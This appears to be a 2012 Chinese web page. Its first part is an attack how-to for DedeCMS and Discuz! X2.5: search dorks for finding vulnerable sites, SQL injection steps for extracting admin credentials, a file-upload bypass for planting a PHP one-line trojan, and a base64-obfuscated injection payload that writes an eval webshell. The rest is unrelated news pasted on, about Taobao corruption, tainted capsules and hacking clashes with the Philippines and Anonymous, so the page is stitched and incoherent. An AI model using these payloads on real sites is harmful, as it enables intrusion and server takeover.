发布时间：2012-4.26 发布作者：佚名 漏洞类型：注入漏洞、上传漏洞 漏洞描述：百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”，获得使用DeDeCMS系统的网站。 注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间，然后访问

页面，
然后访问

页面，如图说明存在该漏洞。
然后写上语句

查看管理员id

查看管理员密码
得到的是19位的，去掉前三位和最后一位，得到管理员的16位MD5 上传漏洞。要求网站开启新会员注册功能，首先注册新会员，无需通过邮件验证，
只要登陆会员中心，然后访问页面链接

通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
于是将Php一句话木马扩展名改为“rar”等，利用提交页面upload1.htm

把url改成目标url就行了。还有个全局变量提交，绕过注册的可以去黑防2月刊上面看。

discuz!x2.5Release20120407 Getshell 0day

利用方法：

————————————————————–

影响版本有：20120407，beta，rc

1.查找目标

搜索：谷歌inurl:home-space-do-blog.html 或者inurl:home.php?mod=space&do=blog

2.注册任意账户

3.登陆用户，发表blog日志（注意是日志）

4.添加图片，选择网络图片，地址:

{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}

5.访问日志，论坛根目录下生成demo.php，一句话密码C

淘宝曾经是创业者的天堂，但短短几年，却变成了多数人的噩梦。

虽然淘宝系有许多成长企业共同所面临的烦恼，但当诚信经营、公平竞争等一系列正常的商业规则被腐败产业链所控制时，淘宝建立在马云价值观上的基本商业道德不复存在。因此折射出来的不仅仅是企业管理结构的问题，还有淘宝员工对社会良知的践踏和对商业信誉的漠视。

当腐败成为淘宝小二的生活状态时，任何局部性的治愈措施都无法改变根本。这就是近几年来，不管马云让涉案的高管下课或是让小二离职，小二们的腐败迹象并没有任何减少的原因。当淘宝没有干净的小二、上下级之间互握把柄时，对马云来说，反腐败，淘宝亡;不反腐败，阿里亡。

一些知名药厂涉嫌使用工业明胶加工胶囊的新闻成为社会焦点，然而就在4月21日，郑州郑上路的一段排污明渠内,一夜之间突然出现大量空心胶囊，300余米的渠沟被各色胶囊堆积成了“彩虹河”。

4月22日消息：“我们来自中国。黄岩岛是我们的。”这是中国黑客攻击菲律宾最著名的大学菲律宾大学网站后，在该校主页上打出的一行文字。据菲律宾媒体报道，有黑客攻击了中国数家网站，同时打出了与中国黑客针锋相对的文字：“黄岩岛是我们的。南沙群岛是我们的。”

菲律宾“GMA News Online”网站4月21日消息称，中菲围绕黄岩岛问题产生的争议带来了另一个后果，即中国数家网站遭黑客攻击，其中包括“中国大学生自强之星”(star.chinaumu.org)、中青在线(v.cyol.com)、中青视频(ploft.cn)等7家网站。

报道称，2名黑客声称对此次攻击负责。

全球黑客组织“匿名者”将目标锁定中国！多家西方媒体6日发出这样的感叹。继宣布入侵中国485个各类网站后，该组织6日叫嚣“将入侵更多的中国网站”，还公布了从被入侵网站上获取的私人信息，呼吁中国人加入“匿名者”组织。这是个曾在西方网络世界兴风作浪多时、但“通常绕开中国”的组织，这次突然盯上中国自称是“抗议中国的互联网审查政策”。不过法国媒体称，“匿名者”的此次战绩“不值得炫耀”，因为其攻破的都是些不太知名的中国网站。美国媒体则猜测，“匿名者”的入侵将引起中国“网络水军”的报复，从而揭开这个神秘黑客组织的老底。

　　“攻击将会持续，目标已经选定。”法新社6日引述“匿名者”组织发给该通讯社记者的电子邮件内容称。3月30日，西方社交网站“推特”上一个名为“匿名者中国”的账户宣布将入侵中国网站，并在Pastebin网站发布数据，列出了485家将入侵的中国网站地址，其中大多数为商业网站，有5家以gov.cn结尾的政府官方网站，分别属于中国成都、大连、中山等地政府。截至6日晚，被“匿名者”入侵的网站大多数已正常运行。不过，美联社6日称，许多被“匿名者”入侵的中国网站在恢复正常后又遭到分布式拒绝服务攻击，还有几家网站的用户名和密码被公布在网络上，如桐城环保局网站等。